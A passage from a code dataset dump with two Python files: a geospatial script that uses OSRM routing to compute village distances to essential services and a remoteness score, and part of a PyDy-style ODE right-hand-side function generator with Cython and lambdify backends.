d_tag))\n\n ## columns to add to the source dataset\n new_cols = {\n \"{}_near\".format(d_tag): 0, ## %%-near = ID of nearest essential service %%\n \"{}_dur\".format(d_tag): 0, ## %%-dur = duration of travel from village to %%\n \"{}_ndst\".format(d_tag): 0, ## %%-ndst = norm distance between village and %%\n \"{}_wdst\".format(d_tag): 0, ## %%-wdst = walking distance between village and %%\n \"snap_dist\": 0\n }\n\n for new_col, new_val in new_cols.items():\n if new_col not in d[source].columns:\n d[source] = d[source].assign(**{new_col: new_val})\n \n ## Get ids and coords for each destination\n d_ids = d[dest].index.tolist()\n d_coords = d[dest].geometry.apply(lambda c: (c.centroid.x, c.centroid.y)).tolist()\n\n max_idx = len(d[source])-1\n bar = progressbar.ProgressBar(max_value=max_idx)\n \n ## Loop thru source origins \n for origin in d[source].itertuples():\n \n (o_idx, o_geo) = (origin[0], origin[3]) # origin index, geometry\n o_coords = (o_geo.x, o_geo.y) # tuple of lon, lat\n\n bar.update(o_idx)\n\n ##\n ## Use OSRM to find distance between origin and all dests\n ##\n \n try:\n (d_dur, o_snap, d_snap) = osrm.table([o_coords],\n ids_origin = [o_idx],\n coords_dest = d_coords,\n ids_dest = d_ids,\n output=\"pandas\")\n\n except urllib.error.URLError as e:\n print(\"URLError. Perhaps osrm-backend is not started?\\n\" +\n \" Error: {}\".format(e.reason))\n sys.exit()\n\n ##\n ## Find the nearest destination and record stats\n ##\n \n d_dur = d_dur.transpose() ## duration from origin to all dests\n d_nearest = d_dur.idxmin()[o_idx] ## id of nearest dest\n d_nearest_dur = d_dur.min()[o_idx] ## duration from origin to nearest dest\n\n if not d_nearest == d_nearest: ## check for nan return values\n d_nearest = d_nearest_dur = d_ndst = -1\n else:\n d_ndst = round(vincenty(d_coords[d_nearest], o_coords).m)\n\n # origin snap distance\n o_sdst = round(vincenty(o_coords, tuple(o_snap[0])).m)\n\n ##\n ## Update the source dataset with the new stats\n ##\n \n ## Add the nearest destination info to source datasets\n d[source].set_value(o_idx, \"{}_near\".format(d_tag), d_nearest)\n d[source].set_value(o_idx, \"{}_dur\".format(d_tag), d_nearest_dur)\n d[source].set_value(o_idx, \"{}_ndst\".format(d_tag), d_ndst)\n d[source].set_value(o_idx, \"snap_dist\", o_sdst)\n\n bar.update(max_idx)\n \n return d[source]\n\ndef calc_route(d, source, dest):\n \n ##\n ### Compute route between each village and each nearest service\n ##\n\n global d_idx, o_idx, d_tag\n \n d_tag = dest[:3]\n\n ech0(\"Calculating routes to nearest {} ({})\".format(dest, d_tag))\n \n ## columns to add to each routes dataset\n route_cols = {\n \"org_id\": 0,\n \"dst_id\": 0,\n \"dist\": 0 \n }\n\n route_df = gp.GeoDataFrame().assign(**route_cols)\n routes = []\n\n max_idx = len(d[source])-1\n r_bar = progressbar.ProgressBar(max_value=max_idx)\n \n for origin in d[source].itertuples():\n \n (o_idx, o_geo) = (origin[0], origin[3])\n o_coords = (o_geo.x, o_geo.y)\n\n r_bar.update(o_idx)\n \n d_idx = getattr(d[source].iloc[o_idx], \"{}_near\".format(d_tag))\n d_row = d[dest].iloc[[d_idx]]\n \n d_coords = d_row.geometry.apply(lambda c: (c.centroid.x, c.centroid.y)).tolist()[0]\n #d_coords = (d_row.geometry.centroid.x, d_row.geometry.centroid.y)\n \n try:\n r_resp = osrm.simple_route(o_coords,\n d_coords,\n geometry=\"wkt\",\n overview=\"full\")\n except urllib.error.HTTPError as e:\n continue\n \n r_dist = r_resp[\"routes\"][0][\"distance\"]\n r_wkt = r_resp[\"routes\"][0][\"geometry\"]\n r_geom = wktToLineString(r_wkt)\n \n ## Set walking distance to each destination on source dataset\n d[source].set_value(o_idx, \"{}_wdst\".format(d_tag), r_dist)\n\n ## Create a linestring route between source and dest\n route = {\n \"org_id\": o_idx,\n \"dst_id\": d_idx,\n \"dist\": r_dist,\n \"geometry\": r_geom\n }\n \n routes.append(route)\n\n r_bar.update(max_idx)\n\n return route_df.append(routes)\n\ndef calc_perp_lines(d, smp_corridor, minDist_m, perpLen_m):\n\n ech0(\"Calculating perpendicular lines (minDist: {}m, perpLen: {}m)\".format(minDist_m, perpLen_m))\n \n corridor = d[smp_corridor]\n wgs84_m2deg = 1/( vincenty((0,0), (0,1)).m )\n \n minDist_d = wgs84_m2deg * minDist_m\n perpLen_d = wgs84_m2deg * perpLen_m\n\n perp_df = gp.GeoDataFrame().assign(name=\"\", osm_id=0, idx=0)\n perp_lines = []\n \n ## loop thru linestrings\n for feature in corridor.itertuples():\n\n (f_idx, f_geo) = (feature[0], feature[3])\n (f_x, f_y) = f_geo.coords.xy\n\n ncoords = len(f_x)\n node_idx = 0\n cum_length = 0\n\n if (ncoords <= 3):\n continue\n\n for i in range(ncoords-2):\n y0 = (f_x[i], f_y[i])\n y1 = (f_x[i+1], f_y[i+1])\n y2 = (f_x[i+2], f_y[i+2])\n\n cum_length = cum_length + Point(y0).distance(Point(y1))\n \n if cum_length >= minDist_d:\n\n ## Perpendicular point\n xp = (y2[0] - y0[0])\n yp = (y2[1] - y0[1])\n\n ## Avoid a Divide by Zero\n if xp == 0:\n xp = np.finfo(float).eps\n \n theta = np.arctan( yp/xp )\n\n dx = perpLen_d * np.cos(theta + np.pi/2)\n dy = perpLen_d * np.sin(theta + np.pi/2)\n\n ## Generate line from \n pt0 = ( (y1[0]-dx), (y1[1]-dy) )\n pt1 = ( y1[0], y1[1] )\n pt2 = ( (y1[0]+dx), (y1[1]+dy) )\n\n perp = {\n \"name\": feature[4],\n \"osm_id\": feature[5],\n \"idx\": node_idx,\n \"geometry\": LineString([pt0, pt1, pt2])\n }\n\n perp_lines.append(perp)\n\n node_idx = node_idx + 1\n cum_length = 0\n\n perp_df = perp_df.append(perp_lines)\n return perp_df\n\ndef calc_remoteness(d, source, dests_w):\n\n ##\n ### Calculates a \"remoteness\" statistic based upon distance to serviced & supplied rates\n ##\n\n ech0(\"Calculating \\\"remoteness\\\"\")\n\n ## Min-max normalization\n def norm(col):\n return (col - col.min()) / (col.max() - col.min())\n\n ##\n d[source] = d[source].assign(remote=0)\n \n for dest in list(dests_w):\n dist_col = d[source][\"{}_wdst\".format(dest[:3])] ## have _wdst be the parameter\n dist_norm = norm(dist_col)\n\n d[source][\"remote\"] = d[source][\"remote\"] + (dist_norm * dests_w[dest])\n\n d[source][\"remote\"] = norm(d[source][\"remote\"])\n \n return d[source]\n\n\ndef save_shp(d):\n\n ## \n ## Save output datasets \n ##\n\n ech0(\"Saving output shp\")\n\n for d_name, d_data in d.items():\n if d_name == source:\n filename = \"{}_remoteness.shp\".format(source)\n else:\n filename = \"{}.shp\".format(d_name)\n\n path = \"{}{}\".format(dirs[\"results\"], filename)\n print(\"Writing: {}\".format(path))\n d_data.to_file(path)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":10672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"37791054","text":"#!/usr/bin/env python\n\nimport warnings\n\nimport numpy as np\nimport numpy.linalg\nimport scipy.linalg\nimport sympy as sm\nimport sympy.physics.mechanics as me\nfrom sympy.core.function import UndefinedFunction\nCython = sm.external.import_module('Cython')\ntheano = sm.external.import_module('theano')\nif theano:\n from sympy.printing.theanocode import theano_function\n\nfrom .cython_code import CythonMatrixGenerator\n\n\nclass ODEFunctionGenerator(object):\n \"\"\"This is an abstract base class for all of the generators. A subclass\n is expected to implement the methods necessary to evaluate the arrays\n needed to compute xdot for the three different system specification\n types.\"\"\"\n\n _rhs_doc_template = \\\n\"\"\"\\\nReturns the derivatives of the states, i.e. numerically evaluates the right\nhand side of the first order differential equation.\n\nx' = f(x, t,{specified_call_sig} p)\n\nParameters\n==========\nx : ndarray, shape({num_states},)\n The state vector is ordered as such:\n{state_list}\nt : float\n The current time.{specifieds_explanation}{constants_explanation}\n\nReturns\n=======\ndx : ndarray, shape({num_states},)\n The derivative of the state vector.\n\n\"\"\"\n\n _constants_doc_templates = {}\n\n _constants_doc_templates[None] = \\\n\"\"\"\np : dictionary len({num_constants}) or ndarray shape({num_constants},)\n Either a dictionary that maps the constants symbols to their numerical\n values or an array with the constants in the following order:\n{constant_list}\\\n\"\"\"\n\n _constants_doc_templates['array'] = \\\n\"\"\"\np : ndarray shape({num_constants},)\n A ndarray of floats that give the numerical values of the constants in\n this order:\n {constant_list}\\\n\"\"\"\n\n _constants_doc_templates['dictionary'] = \\\n\"\"\"\np : dictionary len({num_constants})\n A dictionary that maps the constants symbols to their numerical values\n with at least these keys:\n{constant_list}\\\n\"\"\"\n\n _specifieds_doc_templates = {}\n\n _specifieds_doc_templates[None] = \\\n\"\"\"\nr : dictionary; ndarray, shape({num_specified},); function\n\n There are three options for this argument. (1) is more flexible but\n (2) and (3) are much more efficient.\n\n (1) A dictionary that maps the specified functions of time to floats,\n ndarrays, or functions that produce ndarrays. The keys can be a single\n specified symbolic function of time or a tuple of symbols. The total\n number of symbols must be equal to {num_specified}. If the value is a\n function it must be of the form g(x, t), where x is the current state\n vector ndarray and t is the current time float and it must return an\n ndarray of the correct shape. For example::\n\n r = {{a: 1.0,\n (d, b) : np.array([1.0, 2.0]),\n (e, f) : lambda x, t: np.array(x[0], x[1]),\n c: lambda x, t: np.array(x[2])}}\n\n (2) A ndarray with the specified values in the correct order and of the\n correct shape.\n\n (3) A function that must be of the form g(x, t), where x is the current\n state vector and t is the current time and it must return an ndarray of\n the correct shape.\n\n The specified inputs are, in order:\n{specified_list}\\\n\"\"\"\n\n _specifieds_doc_templates['array'] = \\\n\"\"\"\nr : ndarray, shape({num_specified},)\n\n A ndarray with the specified values in the correct order and of the\n correct shape.\n\n The specified inputs are, in order:\n{specified_list}\\\n\"\"\"\n\n _specifieds_doc_templates['function'] = \\\n\"\"\"\nr : function\n\n A function that must be of the form g(x, t), where x is the current\n state vector and t is the current time and it must return an ndarray of\n shape({num_specified},).\n\n The specified inputs are, in order:\n{specified_list}\\\n\"\"\"\n\n _specifieds_doc_templates['dictionary'] = \\\n\"\"\"\nr : dictionary\n A dictionary that maps the specified functions of time to floats,\n ndarrays, or functions that produce ndarrays. The keys can be a single\n specified symbolic function of time or a tuple of symbols. The total\n number of symbols must be equal to {num_specified}. If the value is a\n function it must be of the form g(x, t), where x is the current state\n vector ndarray and t is the current time float and it must return an\n ndarray of the correct shape. For example::\n\n r = {{a: 1.0,\n (d, b) : np.array([1.0, 2.0]),\n (e, f) : lambda x, t: np.array(x[0], x[1]),\n c: lambda x, t: np.array(x[2])}}\n\n The specified inputs are, in order:\n{specified_list}\\\n\"\"\"\n\n @staticmethod\n def _deduce_system_type(**kwargs):\n \"\"\"Based on the combination of arguments this returns which ODE\n description has been provided.\n\n full rhs\n x' = f(x, t, r, p)\n full mass matrix\n M(x, p) * x' = f(x, t, r, p)\n min mass matrix\n M(q, p) * u' = f(q, u, t, r, p)\n q' = g(q, u, t)\n\n \"\"\"\n\n if kwargs.pop('coordinate_derivatives') is not None:\n system_type = 'min mass matrix'\n elif kwargs.pop('mass_matrix') is not None:\n system_type = 'full mass matrix'\n else:\n system_type = 'full rhs'\n\n return system_type\n\n def __init__(self, right_hand_side, coordinates, speeds, constants,\n mass_matrix=None, coordinate_derivatives=None,\n specifieds=None, linear_sys_solver='numpy',\n constants_arg_type=None, specifieds_arg_type=None):\n \"\"\"Generates a numerical function which can evaluate the right hand\n side of the first order ordinary differential equations from a\n system described by one of the following three symbolic forms:\n\n [1] x' = F(x, t, r, p)\n\n [2] M(x, p) x' = F(x, t, r, p)\n\n [3] M(q, p) u' = F(q, u, t, r, p)\n q' = G(q, u, t, r, p)\n\n where\n\n x : states, i.e. [q, u]\n t : time\n r : specified (exogenous) inputs\n p : constants\n q : generalized coordinates\n u : generalized speeds\n M : mass matrix (full or minimum)\n F : right hand side (full or minimum)\n G : right hand side of the kinematical differential equations\n\n The generated function is of the form F(x, t, p) or F(x, t, r, p)\n depending on whether the system has specified inputs or not.\n\n Parameters\n ==========\n right_hand_side : SymPy Matrix, shape(n, 1)\n A column vector containing the symbolic expressions for the\n right hand side of the ordinary differential equations. If the\n right hand side has been solved for symbolically then only F is\n required, see form [1]; if not then the mass matrix must also be\n supplied, see forms [2, 3].\n coordinates : sequence of SymPy Functions\n The generalized coordinates. These must be ordered in the same\n order as the rows in M, F, and/or G and be functions of time.\n speeds : sequence of SymPy Functions\n The generalized speeds. These must be ordered in the same order\n as the rows in M, F, and/or G and be functions of time.\n constants : sequence of SymPy Symbols\n All of the constants present in the equations of motion. The\n order does not matter.\n mass_matrix : sympy.Matrix, shape(n, n), optional\n This can be either the \"full\" mass matrix as in [2] or the\n \"minimal\" mass matrix as in [3]. The rows and columns must be\n ordered to match the order of the coordinates and speeds. In the\n case of the full mass matrix, the speeds should always be\n ordered before the speeds, i.e. x = [q, u].\n coordinate_derivatives : sympy.Matrix, shape(m, 1), optional\n If the \"minimal\" mass matrix, form [3], is supplied, then this\n column vector represents the right hand side of the kinematical\n differential equations.\n specifieds : sequence of SymPy Functions\n The specified exogenous inputs to the system. These should be\n functions of time and the order does not matter.\n linear_sys_solver : string or function\n Specify either `numpy` or `scipy` to use the linear solvers\n provided in each package or supply a function that solves a\n linear system Ax=b with the call signature x = solve(A, b). For\n example, if you need to use custom kwargs for the SciPy solver,\n pass in a lambda function that wraps the solver and sets them.\n constants_arg_type : string\n The generated function accepts two different types of arguments\n for the numerical values of the constants: either a ndarray of\n the constants values in the correct order or a dictionary\n mapping the constants symbols to the numerical values. If None,\n this is determined inside of the generated function and can\n cause a significant slow down for performance critical code. If\n you know apriori what arg types you need to support choose\n either ``array`` or ``dictionary``. Note that ``array`` is\n faster than ``dictionary``.\n specifieds_arg_type : string\n The generated function accepts three different types of\n arguments for the numerical values of the specifieds: either a\n ndarray of the specifieds values in the correct order, a\n function that generates the correctly ordered ndarray, or a\n dictionary mapping the specifieds symbols or tuples of thereof\n to floats, ndarrays, or functions. If None, this is determined\n inside of the generated function and can cause a significant\n slow down for performance critical code. If you know apriori\n what arg types you want to support choose either ``array``,\n ``function``, or ``dictionary``. The speed of each, from fast to\n slow, are ``array``, ``function``, ``dictionary``, None.\n\n Notes\n =====\n The generated function still supports the pre-0.3.0 extra argument\n style, i.e. args = {'constants': ..., 'specified': ...}, but only if\n ``constants_arg_type`` and ``specifieds_arg_type`` are both set to\n None. This functionality is deprecated and will be removed in 0.4.0,\n so it's best to adjust your code to support the new argument types.\n See the docstring for the generated function for more info on the\n new style of arguments.\n\n \"\"\"\n\n self.right_hand_side = right_hand_side\n self.coordinates = coordinates\n self.speeds = speeds\n self.constants = constants\n self.mass_matrix = mass_matrix\n self.coordinate_derivatives = coordinate_derivatives\n self.specifieds = specifieds\n self.linear_sys_solver = linear_sys_solver\n self.constants_arg_type = constants_arg_type\n self.specifieds_arg_type = specifieds_arg_type\n\n self.system_type = self._deduce_system_type(\n mass_matrix=mass_matrix,\n coordinate_derivatives=coordinate_derivatives)\n\n self.num_coordinates = len(coordinates)\n self.num_speeds = len(speeds)\n self.num_states = self.num_coordinates + self.num_speeds\n self.num_constants = len(constants)\n\n if self.specifieds is None:\n self.num_specifieds = 0\n self.specifieds_arg_type = None\n else:\n self.num_specifieds = len(specifieds)\n\n # These are pre-allocated storage for the numerical values used in\n # some of the rhs() evaluations.\n self._constants_values = np.empty(self.num_constants)\n self._specifieds_values = np.empty(self.num_specifieds)\n\n self._check_system_consitency()\n\n @property\n def linear_sys_solver(self):\n return self._linear_sys_solver\n\n @linear_sys_solver.setter\n def linear_sys_solver(self, v):\n\n if isinstance(v, type(lambda x: x)):\n self._solve_linear_system = v\n elif v == 'numpy':\n self._solve_linear_system = numpy.linalg.solve\n elif v == 'scipy':\n self._solve_linear_system = scipy.linalg.solve\n else:\n msg = '{} is not a valid solver.'\n raise ValueError(msg.format(self.linear_sys_solver))\n\n def _check_system_consitency(self):\n\n if self.system_type == 'min mass matrix':\n\n nr, nc = self.mass_matrix.shape\n assert self.num_speeds == nr == nc\n assert self.num_speeds == self.right_hand_side.shape[0]\n assert self.num_coordinates == self.coordinate_derivatives.shape[0]\n\n elif self.system_type == 'full mass matrix':\n\n nr, nc = self.mass_matrix.shape\n assert self.num_states == nr == nc\n assert self.num_states == self.right_hand_side.shape[0]\n assert self.coordinate_derivatives is None\n\n elif self.system_type == 'full rhs':\n\n assert self.num_states == self.right_hand_side.shape[0]\n assert self.mass_matrix is None\n assert self.coordinate_derivatives is None\n\n @staticmethod\n def list_syms(indent, syms):\n \"\"\"Returns a string representation of a valid rst list of the\n symbols in the sequence syms and indents the list given the integer\n number of indentations.\"\"\"\n indentation = ' ' * indent\n lst = '- ' + ('\\n' + indentation + '- ').join([str(s) for s in syms])\n return indentation + lst\n\n def _parse_old_style_extra_args(self, *args):\n \"\"\"Returns the post-0.3.0 style args if the pre-0.3.0 style args are\n passed in. The pre-0.3.0 style args always have three args: (x, t,\n d) where d is is a dictionary which should always at least contain\n the key 'constants'. It may also contain a key 'specified'.\"\"\"\n\n # DEPRECATED : Remove before 0.4.0 release.\n\n last_arg = args[-1]\n try:\n constants = last_arg['constants']\n # ValueError is needed for older NumPy versions.\n except (KeyError, IndexError, ValueError):\n return args\n else:\n with warnings.catch_warnings():\n warnings.simplefilter('once')\n warnings.warn(\"The old style args, i.e. {'constants': , \"\n \"'specified'}, for the generated function will \"\n \"be removed in PyDy 0.4.0.\", DeprecationWarning)\n\n new_args = list(args[:-1]) # gets x and t\n\n if self.specifieds is not None:\n new_args.append(last_arg['specified'])\n\n new_args.append(constants)\n\n return tuple(new_args)\n\n def _convert_constants_dict_to_array(self, p):\n \"\"\"Returns an array of numerical values from the constants\n dictionary in the correct order.\"\"\"\n\n # NOTE : It's unfortunate that this has to be run at every rhs eval,\n # because subsequent calls to rhs() doesn't require different\n # constants. I suppose you can sub out all the constants in the EoMs\n # before passing them into the generator. That would beg for the\n # capability to support self.constants=None to skip all of this\n # stuff in the rhs eval.\n for i, c in enumerate(self.constants):\n self._constants_values[i] = p[c]\n\n return self._constants_values\n\n def _parse_constants(self, *args):\n \"\"\"Returns an ndarray containing the numerical values of the\n constants in the correct order. If the constants are already an\n array, that array is returned.\"\"\"\n\n p = args[-1]\n try:\n p = self._convert_constants_dict_to_array(p)\n except IndexError:\n # p is an array so just return the args\n return args\n else:\n return args[:-1] + (p,)\n\n def _convert_specifieds_dict_to_array(self, x, t, r):\n\n for k, v in r.items():\n # TODO : Not sure if this is the best check here.\n if isinstance(type(k), UndefinedFunction):\n k = (k,)\n idx = [self.specifieds.index(symmy) for symmy in k]\n try:\n self._specifieds_values[idx] = v(x, t)\n except TypeError: # not callable\n # If not callable, then it should be a float, ndarray,\n # or indexable.\n self._specifieds_values[idx] = v\n\n return self._specifieds_values\n\n def _parse_specifieds(self, x, t, r, p):\n\n if isinstance(r, dict):\n # NOTE : This function sets self._specifieds_values, so here we\n # return nothing.\n self._convert_specifieds_dict_to_array(x, t, r)\n else:\n # More efficient.\n try:\n self._specifieds_values[:] = r(x, t)\n except TypeError: # not callable.\n # If not callable, then it should be a float or ndarray.\n self._specifieds_values[:] = r\n\n return x, t, self._specifieds_values, p\n\n def _parse_all_args(self, *args):\n \"\"\"Returns args formatted for the post 0.3.0 generators using all of\n the parsers. This is the slowest method and is used by default if no\n information is provided by the user on which type of args will be\n passed in.\"\"\"\n\n args = self._parse_old_style_extra_args(*args)\n\n args = self._parse_constants(*args)\n\n if self.specifieds is not None:\n args = self._parse_specifieds(*args)\n\n return args\n\n def _generate_rhs_docstring(self):\n\n template_values = {'num_states': self.num_states,\n 'state_list': self.list_syms(8, self.coordinates\n + self.speeds),\n 'specified_call_sig': '',\n 'constants_explanation':\n self._constants_doc_templates[\n self.constants_arg_type].format(**{\n 'num_constants': self.num_constants,\n 'constant_list': self.list_syms(\n 8, self.constants)}),\n 'specifieds_explanation': ''}\n\n if self.specifieds is not None:\n template_values['specified_call_sig'] = ' r,'\n specified_template_values = {\n 'num_specified': self.num_specifieds,\n 'specified_list': self.list_syms(8, self.specifieds)}\n template_values['specifieds_explanation'] = \\\n self._specifieds_doc_templates[self.constants_arg_type].format(\n **specified_template_values)\n\n return self._rhs_doc_template.format(**template_values)\n\n def _create_rhs_function(self):\n \"\"\"Returns a function in the form expected by scipy.integrate.odeint\n that computes the derivatives of the states.\"\"\"\n\n # This god awful mess below exists because of the need to optimize\n # the speed of the rhs evaluation. We unfortunately support way too\n # many ways to pass in extra arguments to the generated rhs\n # function. The default behavior is to parse the arguments passed\n # into the rhs function which can add a lot of computational\n # overhead. So we allow the user to specify what type the extra args\n # should be for both the constants and the specifieds. The constants\n # can be None, 'array', or 'dictionary'. The specifieds can be None,\n # 'array', 'function', or 'dictionary'. Thus we have 12 permutations\n # of this \"switch\".\n\n p_arg_type = self.constants_arg_type\n r_arg_type = self.specifieds_arg_type\n\n def slice_x(x):\n q = x[:self.num_coordinates]\n u = x[self.num_coordinates:]\n return q, u\n\n if p_arg_type is None and r_arg_type is None:\n\n # This is the only rhs that will properly check for the\n # pre-0.3.0 rhs args for backwards compatibility.\n\n def rhs(*args):\n # args: x, t, p\n # or\n # args: x, t, r, p\n\n args = self._parse_all_args(*args)\n\n q, u = slice_x(args[0])\n\n xdot = self._base_rhs(q, u, *args[2:])\n\n return xdot\n\n elif p_arg_type == 'array' and r_arg_type is None:\n\n # This could be combined with:\n # elif p_arg_type == 'array' and r_arg_type == 'array':\n\n def rhs(*args):\n # args: x, t, p\n # or\n # args: x, t, r, p\n\n if self.specifieds is not None:\n args = self._parse_specifieds(*args)\n\n q, u = slice_x(args[0])\n\n return self._base_rhs(q, u, *args[2:])\n\n elif p_arg_type == 'dictionary' and r_arg_type is None:\n\n # This could be combined with:\n # elif p_arg_type == 'dictionary' and r_arg_type == 'array':\n\n def rhs(*args):\n # args: x, t, p\n # or\n # args: x, t, r, p\n\n if self.specifieds is not None:\n args = self._parse_specifieds(*args)\n\n p = self._convert_constants_dict_to_array(args[-1])\n\n q, u = slice_x(args[0])\n\n xdot = self._base_rhs(q, u, *(args[2:-1] + (p,)))\n\n return xdot\n\n # All of the cases below must have specifieds, so the number of args\n # is known. r_arg_type is forces to be None if self.specifieds is\n # None.\n\n elif p_arg_type is None and r_arg_type == 'array':\n\n def rhs(*args):\n # args: x, t, r, p\n\n args = self._parse_constants(*args)\n\n q, u = slice_x(args[0])\n\n return self._base_rhs(q, u, *args[2:])\n\n elif p_arg_type == 'array' and r_arg_type == 'array':\n\n def rhs(*args):\n # args: x, t, r, p\n\n q, u = slice_x(args[0])\n\n return self._base_rhs(q, u, *args[2:])\n\n elif p_arg_type == 'dictionary' and r_arg_type == 'array':\n\n def rhs(*args):\n # args: x, t, r, p\n\n p = self._convert_constants_dict_to_array(args[-1])\n\n q, u = slice_x(args[0])\n\n return self._base_rhs(q, u, *(args[2:-1] + (p,)))\n\n elif p_arg_type is None and r_arg_type == 'dictionary':\n\n def rhs(*args):\n # args: x, t, r, p\n\n args = self._parse_constants(*args)\n\n q, u = slice_x(args[0])\n\n r = self._convert_specifieds_dict_to_array(*args[:3])\n\n return self._base_rhs(q, u, r, args[-1])\n\n elif p_arg_type == 'array' and r_arg_type == 'dictionary':\n\n def rhs(*args):\n # args: x, t, r, p\n\n q, u = slice_x(args[0])\n\n r = self._convert_specifieds_dict_to_array(*args[:3])\n\n return self._base_rhs(q, u, r, args[-1])\n\n elif p_arg_type == 'dictionary' and r_arg_type == 'dictionary':\n\n def rhs(*args):\n # args: x, t, r, p\n\n q, u = slice_x(args[0])\n\n p = self._convert_constants_dict_to_array(args[-1])\n\n r = self._convert_specifieds_dict_to_array(*args[:3])\n\n return self._base_rhs(q, u, r, p)\n\n elif p_arg_type is None and r_arg_type == 'function':\n\n def rhs(*args):\n # args: x, t, r, p\n\n q, u = slice_x(args[0])\n\n args = self._parse_constants(*args)\n\n r = args[2](*args[:2])\n\n return self._base_rhs(q, u, r, args[-1])\n\n elif p_arg_type == 'array' and r_arg_type == 'function':\n\n def rhs(*args):\n # args: x, t, r, p\n\n q, u = slice_x(args[0])\n\n r = args[2](*args[:2])\n\n return self._base_rhs(q, u, r, args[-1])\n\n elif p_arg_type == 'dictionary' and r_arg_type == 'function':\n\n def rhs(*args):\n # args: x, t, r, p\n\n q, u = slice_x(args[0])\n\n p = self._convert_constants_dict_to_array(args[-1])\n\n r = args[2](*args[:2])\n\n return self._base_rhs(q, u, r, p)\n\n rhs.__doc__ = self._generate_rhs_docstring()\n\n return rhs\n\n def _create_base_rhs_function(self):\n \"\"\"Sets the self._base_rhs function. This functin accepts arguments\n in this form: (q, u, p) or (q, u, r, p).\"\"\"\n\n if self.system_type == 'full rhs':\n\n self._base_rhs = self.eval_arrays\n\n elif self.system_type == 'full mass matrix':\n\n def base_rhs(*args):\n\n M, F = self.eval_arrays(*args)\n return self._solve_linear_system(M, F)\n\n self._base_rhs = base_rhs\n\n elif self.system_type == 'min mass matrix':\n\n xdot = np.empty(self.num_states, dtype=float)\n\n def base_rhs(*args):\n M, F, qdot = self.eval_arrays(*args)\n if self.num_speeds == 1:\n udot = F / M\n else:\n udot = self._solve_linear_system(M, F)\n xdot[:self.num_coordinates] = qdot\n xdot[self.num_coordinates:] = udot\n return xdot\n\n self._base_rhs = base_rhs\n\n def define_inputs(self):\n \"\"\"Sets self.inputs to the list of sequences [q, u, p] or [q, u, r,\n p].\"\"\"\n\n self.inputs = [self.coordinates, self.speeds, self.constants]\n\n if self.specifieds is not None:\n self.inputs.insert(2, self.specifieds)\n\n def generate(self):\n \"\"\"Returns a function that evaluates the right hand side of the\n first order ordinary differential equations in one of two forms:\n\n x' = f(x, t, p)\n\n or\n\n x' = f(x, t, r, p)\n\n See the docstring of the generated function for more details.\n\n \"\"\"\n\n if self.system_type == 'full rhs':\n self.generate_full_rhs_function()\n elif self.system_type == 'full mass matrix':\n self.generate_full_mass_matrix_function()\n elif self.system_type == 'min mass matrix':\n self.generate_min_mass_matrix_function()\n\n self._create_base_rhs_function()\n\n return self._create_rhs_function()\n\n\nclass CythonODEFunctionGenerator(ODEFunctionGenerator):\n\n def __init__(self, *args, **kwargs):\n\n if Cython is None:\n raise ImportError('Cython must be installed to use this class.')\n else:\n super(CythonODEFunctionGenerator, self).__init__(*args, **kwargs)\n\n @staticmethod\n def _cythonize(outputs, inputs):\n return CythonMatrixGenerator(inputs, outputs).compile()\n\n def _set_eval_array(self, f):\n\n if self.specifieds is None:\n self.eval_arrays = lambda q, u, p: f(q, u, p, *self._empties)\n else:\n self.eval_arrays = lambda q, u, r, p: f(q, u, r, p,\n *self._empties)\n\n def generate_full_rhs_function(self):\n\n self.define_inputs()\n outputs = [self.right_hand_side]\n\n self._empties = (np.empty(self.num_states, dtype=float),)\n\n self._set_eval_array(self._cythonize(outputs, self.inputs))\n\n def generate_full_mass_matrix_function(self):\n\n self.define_inputs()\n outputs = [self.mass_matrix, self.right_hand_side]\n\n mass_matrix_result = np.empty(self.num_states ** 2, dtype=float)\n rhs_result = np.empty(self.num_states, dtype=float)\n\n self._empties = (mass_matrix_result, rhs_result)\n\n self._set_eval_array(self._cythonize(outputs, self.inputs))\n\n def generate_min_mass_matrix_function(self):\n\n self.define_inputs()\n outputs = [self.mass_matrix, self.right_hand_side,\n self.coordinate_derivatives]\n\n mass_matrix_result = np.empty(self.num_speeds ** 2, dtype=float)\n rhs_result = np.empty(self.num_speeds, dtype=float)\n kin_diffs_result = np.empty(self.num_coordinates, dtype=float)\n self._empties = (mass_matrix_result, rhs_result, kin_diffs_result)\n\n self._set_eval_array(self._cythonize(outputs, self.inputs))\n\n\nclass LambdifyODEFunctionGenerator(ODEFunctionGenerator):\n\n def _lambdify(self, outputs):\n # TODO : We could forgo this substitution for generation speed\n # purposes and have lots of args for lambdify (like it used to be\n # done) but there may be some limitations on number of args.\n subs = {}\n vec_inputs = []\n if self.specifieds is None:\n def_vecs = ['q', 'u', 'p']\n else:\n def_vecs = ['q', 'u', 'r', 'p']\n\n for syms, vec_name in zip(self.inputs, def_vecs):\n v = sm.DeferredVector(vec_name)\n for i, sym in enumerate(syms):\n subs[sym] = v[i]\n vec_inputs.append(v)\n\n try:\n outputs = [me.msubs(output, subs) for output in outputs]\n except AttributeError:\n # msubs doesn't exist in SymPy < 0.7.6.\n outputs = [output.subs(subs) for output in outputs]\n\n modules = [{'ImmutableMatrix': np.array}, 'numpy']\n\n return sm.lambdify(vec_inputs, outputs, modules=modules)\n\n def generate_full_rhs_function(self):\n\n self.define_inputs()\n outputs = [self.right_hand_side]\n\n f = self._lambdify(outputs)\n\n if self.specifieds is None:\n self.eval_arrays = lambda q, u, p: np.squeeze(f(q, u, p))\n else:\n self.eval_arrays = lambda q, u, r, p: np.squeeze(f(q, u, r, p))\n\n def generate_full_mass_matrix_function(self):\n\n self.define_inputs()\n outputs = [self.mass_matrix, self.right_hand_side]\n\n f = self._lambdify(outputs)\n\n if self.specifieds is None:\n self.eval_arrays = lambda q, u, p: tuple([np.squeeze(o) for o in\n f(q, u, p)])\n else:\n self.eval_arrays = lambda q, u, r, p: tuple([np.squeeze(o) for o\n in f(q, u, r, p)])\n\n def generate_min_mass_matrix_function(self):\n\n self.define_inputs()\n outputs = [self.mass_matrix, self.right_hand_side,\n self.coordinate_derivatives]\n\n f = self._lambdify(outputs)\n\n if self.specifieds is None:\n self.eval_arrays = lambda q, u, p: tuple([np.squeeze(o) for o in\n f(q, u, p)])\n else:\n self.eval_arrays = lambda q, u, r, p: tuple([np.squeeze(o) for o\n in f(q, u, r, p)])\n\n\nclass TheanoODEFunctionGenerator(ODEFunctionGenerator):\n\n def __init__(self, *args, **kwargs):\n\n if theano is None:\n raise ImportError('Theano must be installed to use this class.')\n 